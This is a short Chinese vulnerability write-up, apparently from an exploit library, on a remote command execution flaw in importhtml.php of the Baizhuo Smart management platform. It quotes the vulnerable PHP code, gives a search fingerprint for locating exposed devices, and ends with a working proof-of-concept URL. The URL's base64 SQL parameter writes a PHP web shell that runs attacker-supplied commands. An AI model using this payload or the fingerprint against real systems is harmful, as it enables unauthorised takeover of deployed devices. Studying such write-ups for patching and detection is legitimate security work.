# 百卓 Smart importhtml.php 远程命令执行漏洞 ## 漏洞描述 百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行 ## 漏洞影响 百卓 Smart ## 网络测绘 title="Smart管理平台" ## 漏洞复现 登录页面 ![img](/library/img/image-20210718204640874.png) 出现漏洞的文件 `importhtml.php` ```php ``` 跟踪exportHtmlMail函数 ```php function exportHtmlMail($filename,$sql){ Header( "Expires: 0" ); Header( "Pragma: public" ); Header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" ); Header( "Cache-Control: public"); Header( "Content-Type: application/octet-stream" ); header("Accept-Ranges: bytes"); header("Content-Disposition: attachment; filename=$filename.html"); echo "\n"; echo "报表\n"; echo "\n"; $conn = connOther(); $result = mysql_query($sql,$conn); while ($data= mysql_fetch_array($result)){ $post_content = ""; if($data['mail_file_path'] == "(null)"){ $post_content = "内容审计未启用"; } else{ $post_filename=$data['mail_file_path']; $ifother = ""; $ifother = ifExistOther($post_filename); if($ifother!=""){ $post_filename = $ifother; } $str = "/usr/bin/cap2con $post_filename pop"; system($str,$returnvalue); $post_filename=str_replace(".cap",".eml",$post_filename); $post_content = file_get_contents($post_filename); $rec=new mime_decode; $post_content=$rec->decode_mime_string($post_content); //... } } } ``` 这里可以发现通过base64解码后执行的Sql语句结果传入函数exportHtmlMail中调用system执行, 而 $post_filename 可控 ```php $str = "/usr/bin/cap2con $post_filename pop"; ``` 验证POC ```plain https://xxx.xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn ``` 访问成功后会触发下载日志文件,再访问 sys1.php ![img](/library/img/image-20210718204705207.png)